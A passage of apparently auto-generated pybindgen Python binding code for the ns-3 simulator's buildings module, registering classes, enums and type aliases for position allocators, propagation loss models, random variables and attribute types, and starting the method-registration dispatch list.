ns3::int64x64_t [class] module.add_class('int64x64_t', import_from_module='ns.core') ## int64x64-double.h (module 'core'): ns3::int64x64_t::impl_type [enumeration] module.add_enum('impl_type', ['int128_impl', 'cairo_impl', 'ld_impl'], outer_class=root_module['ns3::int64x64_t'], import_from_module='ns.core') ## object.h (module 'core'): ns3::Object [class] module.add_class('Object', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >']) ## object.h (module 'core'): ns3::Object::AggregateIterator [class] module.add_class('AggregateIterator', import_from_module='ns.core', outer_class=root_module['ns3::Object']) ## position-allocator.h (module 'mobility'): ns3::PositionAllocator [class] module.add_class('PositionAllocator', import_from_module='ns.mobility', parent=root_module['ns3::Object']) ## propagation-loss-model.h (module 'propagation'): ns3::PropagationLossModel [class] module.add_class('PropagationLossModel', import_from_module='ns.propagation', parent=root_module['ns3::Object']) ## position-allocator.h (module 'mobility'): ns3::RandomBoxPositionAllocator [class] module.add_class('RandomBoxPositionAllocator', import_from_module='ns.mobility', parent=root_module['ns3::PositionAllocator']) ## building-position-allocator.h (module 'buildings'): ns3::RandomBuildingPositionAllocator [class] module.add_class('RandomBuildingPositionAllocator', parent=root_module['ns3::PositionAllocator']) ## position-allocator.h (module 'mobility'): ns3::RandomDiscPositionAllocator [class] module.add_class('RandomDiscPositionAllocator', import_from_module='ns.mobility', parent=root_module['ns3::PositionAllocator']) ## propagation-loss-model.h (module 'propagation'): ns3::RandomPropagationLossModel [class] module.add_class('RandomPropagationLossModel', import_from_module='ns.propagation', parent=root_module['ns3::PropagationLossModel']) ## position-allocator.h (module 'mobility'): ns3::RandomRectanglePositionAllocator 
[class] module.add_class('RandomRectanglePositionAllocator', import_from_module='ns.mobility', parent=root_module['ns3::PositionAllocator']) ## building-position-allocator.h (module 'buildings'): ns3::RandomRoomPositionAllocator [class] module.add_class('RandomRoomPositionAllocator', parent=root_module['ns3::PositionAllocator']) ## random-variable-stream.h (module 'core'): ns3::RandomVariableStream [class] module.add_class('RandomVariableStream', import_from_module='ns.core', parent=root_module['ns3::Object']) ## propagation-loss-model.h (module 'propagation'): ns3::RangePropagationLossModel [class] module.add_class('RangePropagationLossModel', import_from_module='ns.propagation', parent=root_module['ns3::PropagationLossModel']) ## building-position-allocator.h (module 'buildings'): ns3::SameRoomPositionAllocator [class] module.add_class('SameRoomPositionAllocator', parent=root_module['ns3::PositionAllocator']) ## random-variable-stream.h (module 'core'): ns3::SequentialRandomVariable [class] module.add_class('SequentialRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeChecker', 'ns3::empty', 
'ns3::DefaultDeleter<ns3::AttributeChecker>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeValue', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeValue>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::CallbackImplBase', 'ns3::empty', 'ns3::DefaultDeleter<ns3::CallbackImplBase>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Hash::Implementation', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Hash::Implementation>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter<ns3::NetDeviceQueue> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, 
import_from_module='ns.core', template_parameters=['ns3::NetDeviceQueue', 'ns3::empty', 'ns3::DefaultDeleter<ns3::NetDeviceQueue>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::QueueItem, ns3::empty, ns3::DefaultDeleter<ns3::QueueItem> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::QueueItem', 'ns3::empty', 'ns3::DefaultDeleter<ns3::QueueItem>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::TraceSourceAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::TraceSourceAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## propagation-loss-model.h (module 'propagation'): ns3::ThreeLogDistancePropagationLossModel [class] module.add_class('ThreeLogDistancePropagationLossModel', import_from_module='ns.propagation', parent=root_module['ns3::PropagationLossModel']) ## nstime.h (module 'core'): ns3::Time [class] module.add_class('Time', import_from_module='ns.core') ## nstime.h (module 'core'): ns3::Time::Unit [enumeration] module.add_enum('Unit', ['Y', 'D', 'H', 'MIN', 'S', 'MS', 'US', 'NS', 'PS', 'FS', 'LAST'], outer_class=root_module['ns3::Time'], import_from_module='ns.core') ## nstime.h (module 'core'): ns3::Time [class] 
root_module['ns3::Time'].implicitly_converts_to(root_module['ns3::int64x64_t']) ## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor [class] module.add_class('TraceSourceAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >']) ## random-variable-stream.h (module 'core'): ns3::TriangularRandomVariable [class] module.add_class('TriangularRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## propagation-loss-model.h (module 'propagation'): ns3::TwoRayGroundPropagationLossModel [class] module.add_class('TwoRayGroundPropagationLossModel', import_from_module='ns.propagation', parent=root_module['ns3::PropagationLossModel']) ## position-allocator.h (module 'mobility'): ns3::UniformDiscPositionAllocator [class] module.add_class('UniformDiscPositionAllocator', import_from_module='ns.mobility', parent=root_module['ns3::PositionAllocator']) ## random-variable-stream.h (module 'core'): ns3::UniformRandomVariable [class] module.add_class('UniformRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## random-variable-stream.h (module 'core'): ns3::WeibullRandomVariable [class] module.add_class('WeibullRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## random-variable-stream.h (module 'core'): ns3::ZetaRandomVariable [class] module.add_class('ZetaRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## random-variable-stream.h (module 'core'): ns3::ZipfRandomVariable [class] module.add_class('ZipfRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## attribute.h (module 'core'): ns3::AttributeAccessor [class] module.add_class('AttributeAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< 
ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >']) ## attribute.h (module 'core'): ns3::AttributeChecker [class] module.add_class('AttributeChecker', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >']) ## attribute.h (module 'core'): ns3::AttributeValue [class] module.add_class('AttributeValue', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >']) ## box.h (module 'mobility'): ns3::BoxChecker [class] module.add_class('BoxChecker', import_from_module='ns.mobility', parent=root_module['ns3::AttributeChecker']) ## box.h (module 'mobility'): ns3::BoxValue [class] module.add_class('BoxValue', import_from_module='ns.mobility', parent=root_module['ns3::AttributeValue']) ## building.h (module 'buildings'): ns3::Building [class] module.add_class('Building', parent=root_module['ns3::Object']) ## building.h (module 'buildings'): ns3::Building::BuildingType_t [enumeration] module.add_enum('BuildingType_t', ['Residential', 'Office', 'Commercial'], outer_class=root_module['ns3::Building']) ## building.h (module 'buildings'): ns3::Building::ExtWallsType_t [enumeration] module.add_enum('ExtWallsType_t', ['Wood', 'ConcreteWithWindows', 'ConcreteWithoutWindows', 'StoneBlocks'], outer_class=root_module['ns3::Building']) ## buildings-propagation-loss-model.h (module 'buildings'): ns3::BuildingsPropagationLossModel [class] module.add_class('BuildingsPropagationLossModel', parent=root_module['ns3::PropagationLossModel']) ## callback.h (module 'core'): ns3::CallbackChecker [class] module.add_class('CallbackChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker']) ## callback.h (module 'core'): ns3::CallbackImplBase [class] 
module.add_class('CallbackImplBase', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >']) ## callback.h (module 'core'): ns3::CallbackValue [class] module.add_class('CallbackValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue']) ## random-variable-stream.h (module 'core'): ns3::ConstantRandomVariable [class] module.add_class('ConstantRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## random-variable-stream.h (module 'core'): ns3::DeterministicRandomVariable [class] module.add_class('DeterministicRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## random-variable-stream.h (module 'core'): ns3::EmpiricalRandomVariable [class] module.add_class('EmpiricalRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## attribute.h (module 'core'): ns3::EmptyAttributeAccessor [class] module.add_class('EmptyAttributeAccessor', import_from_module='ns.core', parent=root_module['ns3::AttributeAccessor']) ## attribute.h (module 'core'): ns3::EmptyAttributeChecker [class] module.add_class('EmptyAttributeChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker']) ## attribute.h (module 'core'): ns3::EmptyAttributeValue [class] module.add_class('EmptyAttributeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue']) ## random-variable-stream.h (module 'core'): ns3::ErlangRandomVariable [class] module.add_class('ErlangRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## random-variable-stream.h (module 'core'): ns3::ExponentialRandomVariable [class] module.add_class('ExponentialRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## building-position-allocator.h (module 'buildings'): 
ns3::FixedRoomPositionAllocator [class] module.add_class('FixedRoomPositionAllocator', parent=root_module['ns3::PositionAllocator']) ## propagation-loss-model.h (module 'propagation'): ns3::FixedRssLossModel [class] module.add_class('FixedRssLossModel', import_from_module='ns.propagation', parent=root_module['ns3::PropagationLossModel']) ## propagation-loss-model.h (module 'propagation'): ns3::FriisPropagationLossModel [class] module.add_class('FriisPropagationLossModel', import_from_module='ns.propagation', parent=root_module['ns3::PropagationLossModel']) ## random-variable-stream.h (module 'core'): ns3::GammaRandomVariable [class] module.add_class('GammaRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## building-allocator.h (module 'buildings'): ns3::GridBuildingAllocator [class] module.add_class('GridBuildingAllocator', parent=root_module['ns3::Object']) ## position-allocator.h (module 'mobility'): ns3::GridPositionAllocator [class] module.add_class('GridPositionAllocator', import_from_module='ns.mobility', parent=root_module['ns3::PositionAllocator']) ## position-allocator.h (module 'mobility'): ns3::GridPositionAllocator::LayoutType [enumeration] module.add_enum('LayoutType', ['ROW_FIRST', 'COLUMN_FIRST'], outer_class=root_module['ns3::GridPositionAllocator'], import_from_module='ns.mobility') ## hybrid-buildings-propagation-loss-model.h (module 'buildings'): ns3::HybridBuildingsPropagationLossModel [class] module.add_class('HybridBuildingsPropagationLossModel', parent=root_module['ns3::BuildingsPropagationLossModel']) ## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker [class] module.add_class('Ipv4AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker']) ## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue [class] module.add_class('Ipv4AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue']) ## ipv4-address.h (module 
'network'): ns3::Ipv4MaskChecker [class] module.add_class('Ipv4MaskChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker']) ## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue [class] module.add_class('Ipv4MaskValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue']) ## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker [class] module.add_class('Ipv6AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker']) ## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue [class] module.add_class('Ipv6AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue']) ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker [class] module.add_class('Ipv6PrefixChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker']) ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue [class] module.add_class('Ipv6PrefixValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue']) ## itu-r-1238-propagation-loss-model.h (module 'buildings'): ns3::ItuR1238PropagationLossModel [class] module.add_class('ItuR1238PropagationLossModel', parent=root_module['ns3::PropagationLossModel']) ## position-allocator.h (module 'mobility'): ns3::ListPositionAllocator [class] module.add_class('ListPositionAllocator', import_from_module='ns.mobility', parent=root_module['ns3::PositionAllocator']) ## propagation-loss-model.h (module 'propagation'): ns3::LogDistancePropagationLossModel [class] module.add_class('LogDistancePropagationLossModel', import_from_module='ns.propagation', parent=root_module['ns3::PropagationLossModel']) ## random-variable-stream.h (module 'core'): ns3::LogNormalRandomVariable [class] module.add_class('LogNormalRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## propagation-loss-model.h (module 'propagation'): ns3::MatrixPropagationLossModel [class] 
module.add_class('MatrixPropagationLossModel', import_from_module='ns.propagation', parent=root_module['ns3::PropagationLossModel']) ## mobility-building-info.h (module 'buildings'): ns3::MobilityBuildingInfo [class] module.add_class('MobilityBuildingInfo', parent=root_module['ns3::Object']) ## propagation-loss-model.h (module 'propagation'): ns3::NakagamiPropagationLossModel [class] module.add_class('NakagamiPropagationLossModel', import_from_module='ns.propagation', parent=root_module['ns3::PropagationLossModel']) ## net-device.h (module 'network'): ns3::NetDevice [class] module.add_class('NetDevice', import_from_module='ns.network', parent=root_module['ns3::Object']) ## net-device.h (module 'network'): ns3::NetDevice::PacketType [enumeration] module.add_enum('PacketType', ['PACKET_HOST', 'NS3_PACKET_HOST', 'PACKET_BROADCAST', 'NS3_PACKET_BROADCAST', 'PACKET_MULTICAST', 'NS3_PACKET_MULTICAST', 'PACKET_OTHERHOST', 'NS3_PACKET_OTHERHOST'], outer_class=root_module['ns3::NetDevice'], import_from_module='ns.network') ## net-device.h (module 'network'): ns3::NetDeviceQueue [class] module.add_class('NetDeviceQueue', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter<ns3::NetDeviceQueue> >']) ## net-device.h (module 'network'): ns3::NetDeviceQueueInterface [class] module.add_class('NetDeviceQueueInterface', import_from_module='ns.network', parent=root_module['ns3::Object']) ## node.h (module 'network'): ns3::Node [class] module.add_class('Node', import_from_module='ns.network', parent=root_module['ns3::Object']) ## random-variable-stream.h (module 'core'): ns3::NormalRandomVariable [class] module.add_class('NormalRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## object-factory.h (module 'core'): ns3::ObjectFactoryChecker [class] module.add_class('ObjectFactoryChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker']) ## 
object-factory.h (module 'core'): ns3::ObjectFactoryValue [class] module.add_class('ObjectFactoryValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue']) ## oh-buildings-propagation-loss-model.h (module 'buildings'): ns3::OhBuildingsPropagationLossModel [class] module.add_class('OhBuildingsPropagationLossModel', parent=root_module['ns3::BuildingsPropagationLossModel']) ## random-variable-stream.h (module 'core'): ns3::ParetoRandomVariable [class] module.add_class('ParetoRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## net-device.h (module 'network'): ns3::QueueItem [class] module.add_class('QueueItem', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::QueueItem, ns3::empty, ns3::DefaultDeleter<ns3::QueueItem> >']) ## net-device.h (module 'network'): ns3::QueueItem::Uint8Values [enumeration] module.add_enum('Uint8Values', ['IP_DSFIELD'], outer_class=root_module['ns3::QueueItem'], import_from_module='ns.network') ## nstime.h (module 'core'): ns3::TimeValue [class] module.add_class('TimeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue']) ## type-id.h (module 'core'): ns3::TypeIdChecker [class] module.add_class('TypeIdChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker']) ## type-id.h (module 'core'): ns3::TypeIdValue [class] module.add_class('TypeIdValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue']) ## vector.h (module 'core'): ns3::Vector2DChecker [class] module.add_class('Vector2DChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker']) ## vector.h (module 'core'): ns3::Vector2DValue [class] module.add_class('Vector2DValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue']) ## vector.h (module 'core'): ns3::Vector3DChecker [class] module.add_class('Vector3DChecker', import_from_module='ns.core', 
parent=root_module['ns3::AttributeChecker']) ## vector.h (module 'core'): ns3::Vector3DValue [class] module.add_class('Vector3DValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue']) ## address.h (module 'network'): ns3::AddressChecker [class] module.add_class('AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker']) ## address.h (module 'network'): ns3::AddressValue [class] module.add_class('AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue']) typehandlers.add_type_alias(u'ns3::Vector3D', u'ns3::Vector') typehandlers.add_type_alias(u'ns3::Vector3D*', u'ns3::Vector*') typehandlers.add_type_alias(u'ns3::Vector3D&', u'ns3::Vector&') module.add_typedef(root_module['ns3::Vector3D'], 'Vector') typehandlers.add_type_alias(u'ns3::Vector3DValue', u'ns3::VectorValue') typehandlers.add_type_alias(u'ns3::Vector3DValue*', u'ns3::VectorValue*') typehandlers.add_type_alias(u'ns3::Vector3DValue&', u'ns3::VectorValue&') module.add_typedef(root_module['ns3::Vector3DValue'], 'VectorValue') typehandlers.add_type_alias(u'ns3::Vector3DChecker', u'ns3::VectorChecker') typehandlers.add_type_alias(u'ns3::Vector3DChecker*', u'ns3::VectorChecker*') typehandlers.add_type_alias(u'ns3::Vector3DChecker&', u'ns3::VectorChecker&') module.add_typedef(root_module['ns3::Vector3DChecker'], 'VectorChecker') ## Register a nested module for the namespace FatalImpl nested_module = module.add_cpp_namespace('FatalImpl') register_types_ns3_FatalImpl(nested_module) ## Register a nested module for the namespace Hash nested_module = module.add_cpp_namespace('Hash') register_types_ns3_Hash(nested_module) ## Register a nested module for the namespace TracedValueCallback nested_module = module.add_cpp_namespace('TracedValueCallback') register_types_ns3_TracedValueCallback(nested_module) def register_types_ns3_FatalImpl(module): root_module = module.get_root() def register_types_ns3_Hash(module): root_module = 
module.get_root() ## hash-function.h (module 'core'): ns3::Hash::Implementation [class] module.add_class('Implementation', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >']) typehandlers.add_type_alias(u'uint32_t ( * ) ( char const *, size_t ) *', u'ns3::Hash::Hash32Function_ptr') typehandlers.add_type_alias(u'uint32_t ( * ) ( char const *, size_t ) **', u'ns3::Hash::Hash32Function_ptr*') typehandlers.add_type_alias(u'uint32_t ( * ) ( char const *, size_t ) *&', u'ns3::Hash::Hash32Function_ptr&') typehandlers.add_type_alias(u'uint64_t ( * ) ( char const *, size_t ) *', u'ns3::Hash::Hash64Function_ptr') typehandlers.add_type_alias(u'uint64_t ( * ) ( char const *, size_t ) **', u'ns3::Hash::Hash64Function_ptr*') typehandlers.add_type_alias(u'uint64_t ( * ) ( char const *, size_t ) *&', u'ns3::Hash::Hash64Function_ptr&') ## Register a nested module for the namespace Function nested_module = module.add_cpp_namespace('Function') register_types_ns3_Hash_Function(nested_module) def register_types_ns3_Hash_Function(module): root_module = module.get_root() ## hash-fnv.h (module 'core'): ns3::Hash::Function::Fnv1a [class] module.add_class('Fnv1a', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation']) ## hash-function.h (module 'core'): ns3::Hash::Function::Hash32 [class] module.add_class('Hash32', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation']) ## hash-function.h (module 'core'): ns3::Hash::Function::Hash64 [class] module.add_class('Hash64', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation']) ## hash-murmur3.h (module 'core'): ns3::Hash::Function::Murmur3 [class] module.add_class('Murmur3', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation']) def register_types_ns3_TracedValueCallback(module): root_module = module.get_root() typehandlers.add_type_alias(u'void 
( * ) ( ns3::Time, ns3::Time ) *', u'ns3::TracedValueCallback::Time') typehandlers.add_type_alias(u'void ( * ) ( ns3::Time, ns3::Time ) **', u'ns3::TracedValueCallback::Time*') typehandlers.add_type_alias(u'void ( * ) ( ns3::Time, ns3::Time ) *&', u'ns3::TracedValueCallback::Time&')
## Dispatch: call the per-class register_Ns3*_methods helper for every wrapped
## class on the root module. Generated code -- the call list must stay in sync
## with the helper definitions that follow.
def register_methods(root_module): register_Ns3Address_methods(root_module, root_module['ns3::Address']) register_Ns3AttributeConstructionList_methods(root_module, root_module['ns3::AttributeConstructionList']) register_Ns3AttributeConstructionListItem_methods(root_module, root_module['ns3::AttributeConstructionList::Item']) register_Ns3Box_methods(root_module, root_module['ns3::Box']) register_Ns3BuildingContainer_methods(root_module, root_module['ns3::BuildingContainer']) register_Ns3BuildingList_methods(root_module, root_module['ns3::BuildingList']) register_Ns3BuildingsHelper_methods(root_module, root_module['ns3::BuildingsHelper']) register_Ns3CallbackBase_methods(root_module, root_module['ns3::CallbackBase']) register_Ns3ConstantVelocityHelper_methods(root_module, root_module['ns3::ConstantVelocityHelper']) register_Ns3Hasher_methods(root_module, root_module['ns3::Hasher']) register_Ns3Ipv4Address_methods(root_module, root_module['ns3::Ipv4Address']) register_Ns3Ipv4Mask_methods(root_module, root_module['ns3::Ipv4Mask']) register_Ns3Ipv6Address_methods(root_module, root_module['ns3::Ipv6Address']) register_Ns3Ipv6Prefix_methods(root_module, root_module['ns3::Ipv6Prefix']) register_Ns3NodeContainer_methods(root_module, root_module['ns3::NodeContainer']) register_Ns3ObjectBase_methods(root_module, root_module['ns3::ObjectBase']) register_Ns3ObjectDeleter_methods(root_module, root_module['ns3::ObjectDeleter']) register_Ns3ObjectFactory_methods(root_module, root_module['ns3::ObjectFactory']) register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >']) register_Ns3TagBuffer_methods(root_module, root_module['ns3::TagBuffer']) register_Ns3TimeWithUnit_methods(root_module, root_module['ns3::TimeWithUnit']) register_Ns3TypeId_methods(root_module, root_module['ns3::TypeId']) register_Ns3TypeIdAttributeInformation_methods(root_module, root_module['ns3::TypeId::AttributeInformation']) register_Ns3TypeIdTraceSourceInformation_methods(root_module, root_module['ns3::TypeId::TraceSourceInformation']) register_Ns3Vector2D_methods(root_module, root_module['ns3::Vector2D']) register_Ns3Vector3D_methods(root_module, root_module['ns3::Vector3D']) register_Ns3Empty_methods(root_module, root_module['ns3::empty']) register_Ns3Int64x64_t_methods(root_module, root_module['ns3::int64x64_t']) register_Ns3Object_methods(root_module, root_module['ns3::Object']) register_Ns3ObjectAggregateIterator_methods(root_module, root_module['ns3::Object::AggregateIterator']) register_Ns3PositionAllocator_methods(root_module, root_module['ns3::PositionAllocator']) register_Ns3PropagationLossModel_methods(root_module, root_module['ns3::PropagationLossModel']) register_Ns3RandomBoxPositionAllocator_methods(root_module, root_module['ns3::RandomBoxPositionAllocator']) register_Ns3RandomBuildingPositionAllocator_methods(root_module, root_module['ns3::RandomBuildingPositionAllocator']) register_Ns3RandomDiscPositionAllocator_methods(root_module, root_module['ns3::RandomDiscPositionAllocator']) register_Ns3RandomPropagationLossModel_methods(root_module, root_module['ns3::RandomPropagationLossModel']) register_Ns3RandomRectanglePositionAllocator_methods(root_module, root_module['ns3::RandomRectanglePositionAllocator']) register_Ns3RandomRoomPositionAllocator_methods(root_module, root_module['ns3::RandomRoomPositionAllocator']) register_Ns3RandomVariableStream_methods(root_module, root_module['ns3::RandomVariableStream']) register_Ns3RangePropagationLossModel_methods(root_module, root_module['ns3::RangePropagationLossModel']) register_Ns3SameRoomPositionAllocator_methods(root_module, root_module['ns3::SameRoomPositionAllocator']) register_Ns3SequentialRandomVariable_methods(root_module, root_module['ns3::SequentialRandomVariable']) register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >']) register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >']) register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >']) register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >']) register_Ns3SimpleRefCount__Ns3HashImplementation_Ns3Empty_Ns3DefaultDeleter__lt__ns3HashImplementation__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >']) register_Ns3SimpleRefCount__Ns3NetDeviceQueue_Ns3Empty_Ns3DefaultDeleter__lt__ns3NetDeviceQueue__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter<ns3::NetDeviceQueue> >']) register_Ns3SimpleRefCount__Ns3QueueItem_Ns3Empty_Ns3DefaultDeleter__lt__ns3QueueItem__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::QueueItem, ns3::empty, ns3::DefaultDeleter<ns3::QueueItem> >']) register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >']) register_Ns3ThreeLogDistancePropagationLossModel_methods(root_module, root_module['ns3::ThreeLogDistancePropagationLossModel']) register_Ns3Time_methods(root_module, root_module['ns3::Time']) register_Ns3TraceSourceAccessor_methods(root_module, root_module['ns3::TraceSourceAccessor']) register_Ns3TriangularRandomVariable_methods(root_module, root_module['ns3::TriangularRandomVariable']) register_Ns3TwoRayGroundPropagationLossModel_methods(root_module, 